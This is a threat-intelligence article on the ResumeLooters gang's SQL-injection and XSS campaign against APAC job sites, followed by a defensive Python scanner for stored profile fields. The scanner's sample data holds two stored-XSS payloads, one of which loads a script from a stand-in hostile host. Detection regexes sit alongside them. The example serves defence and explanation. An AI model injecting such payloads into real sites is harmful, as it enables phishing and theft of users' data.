ResumeLooters: Cyber Predators Targeting Job Seekers’ Data
In November 2023, a new and sinister threat emerged: ResumeLooters, a malicious gang that set its sights on job seekers’ sensitive personal data. Discovered by Group-IB’s Threat Intelligence unit, ResumeLooters launched a massive campaign aimed at employment agencies and retail companies primarily located in the Asia-Pacific (APAC) region. Their modus operandi involved stealing and selling sensitive user data, and their tactics were nothing short of audacious.
The group was a complete enigma, previously unknown to the cybersecurity community. However, their modus operandi was unmistakable. They focused on infiltrating job search platforms and brazenly swiping resumes, hence the moniker “ResumeLooters.”
Between November and December 2023, ResumeLooters left a trail of chaos. Their nefarious activities encompassed SQL injection and Cross-Site Scripting (XSS) attacks, leaving victims reeling. With a primary focus on India, Taiwan, Thailand, and Vietnam, the gang homed in on vulnerable targets, leaving behind a staggering tally of 65 compromised websites.
The stolen files contained a trove of 2,188,444 rows of data, with 510,259 rows specifically pilfered from job search websites. This data goldmine included names, phone numbers, emails, dates of birth, employment histories, and a treasure trove of other sensitive personal information.
ResumeLooters weren’t your run-of-the-mill cybercriminals; they were well-armed with an arsenal of penetration testing tools. Tools like sqlmap, Acunetix, Beef Framework, X-Ray, Metasploit, ARL (Asset Reconnaissance Lighthouse), and Dirsearch were all at their disposal.
SQL injection attacks via sqlmap were their preferred initial vector of attack. However, the gang’s versatility shone through with their use of XSS scripts, embedded cunningly into legitimate job search websites.
Cross-site scripting (XSS) was a pivotal weapon in ResumeLooters’ arsenal. By injecting malicious scripts into legitimate job search websites, they aimed to hijack unsuspecting users’ experiences.
Several compromised websites bore the scars of this insidious technique. A fake employer profile on one such site contained an injected XSS script that referenced a malevolent domain, 8r[.]ae. This was the gateway to a web of deception.
The gang’s deviousness knew no bounds. They even created a fake company profile, complete with a strategically placed XSS script. This seemingly innocuous profile contained a link to admin.cloudnetsafe[.]com, a domain suspected to be associated with the group.
Admin.cloudnetsafe[.]com was a clone of the main malicious domain linked to ResumeLooters, admin.cloudnetsofe[.]com. Both hosted malicious scripts and phishing pages, laying bare their sinister intentions.
ResumeLooters’ tenacity was evident in their repeated attempts to insert XSS scripts into various web forms on targeted websites. They were banking on these scripts displaying phishing forms, luring unsuspecting users into a web of deceit.
While not every device fell victim to these scripts, some did, and this provided ResumeLooters with access to a wealth of stolen HTML code and other sensitive data.
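As an added defender-side example (not from the Group-IB report and not code belonging to the group), the check below scans stored employer-profile fields of the kind ResumeLooters abused for injected script tags and inline event handlers that reference an untrusted host, and escapes a field before it is rendered so a stored payload displays as text. The profile records, the trusted host list and the hostname placeholder-evil.invalid are constructed for the example.

```python
import html
import re
from urllib.parse import urlparse

# Constructed sample of stored employer-profile fields, as a defender might pull
# them from a job-site database during a review. The hostname is a placeholder,
# not one of the domains named in the report.
SAMPLE_PROFILES = [
    {"id": 1, "company": "Acme Logistics", "about": "We hire drivers across APAC."},
    {"id": 2, "company": "Bright Talent",
     "about": 'Join us! <script src="https://placeholder-evil.invalid/p.js"></script>'},
    {"id": 3, "company": "Nova Retail",
     "about": '<img src=x onerror="document.location=\'https://placeholder-evil.invalid/login\'">'},
    {"id": 4, "company": "Safe Co", "about": "Contact us at https://safeco.example/careers"},
]

# Hosts the site itself legitimately links to (assumed for the example).
TRUSTED_HOSTS = {"safeco.example"}

SCRIPT_SRC = re.compile(r'<script[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
INLINE_HANDLER = re.compile(r'<[^>]+\son[a-z]+\s*=', re.I)
URL = re.compile(r'https?://[^\s"\'<>]+', re.I)


def external_hosts(text):
    """Return hostnames referenced in text that are not in TRUSTED_HOSTS."""
    hosts = set()
    for u in URL.findall(text):
        host = urlparse(u).hostname
        if host and host not in TRUSTED_HOSTS:
            hosts.add(host)
    return hosts


def flag_profile(profile):
    """Return a list of findings for one stored profile record (empty if clean)."""
    findings = []
    text = profile["about"]
    if SCRIPT_SRC.search(text):
        findings.append("script-src")
    if INLINE_HANDLER.search(text):
        findings.append("inline-handler")
    ext = external_hosts(text)
    # Only report the host when active content is present; a plain link is not a finding.
    if findings and ext:
        findings.append("external-host:" + ",".join(sorted(ext)))
    return findings


def scan(profiles):
    """Map profile id -> findings for every record that is flagged."""
    report = {}
    for p in profiles:
        findings = flag_profile(p)
        if findings:
            report[p["id"]] = findings
    return report


def render_about(text):
    """Escape before rendering so a stored payload shows as text, not markup."""
    return html.escape(text, quote=True)
```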
With a simple yet potent combination of publicly available tools and techniques, ResumeLooters caused widespread damage. These attacks underscore the dire need for organizations to prioritize cybersecurity and remain vigilant in the face of evolving threats.